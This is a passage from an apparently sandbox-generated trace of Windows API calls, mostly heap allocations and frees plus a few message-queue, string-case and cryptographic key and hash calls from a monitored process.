wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.489] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.489] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.489] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.489] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.489] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.489] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0255.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.493] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.493] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.493] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.495] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.495] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.495] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.496] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.496] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.496] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0255.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0255.499] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0255.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.499] CryptDestroyHash (hHash=0xaa5860) returned 1 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 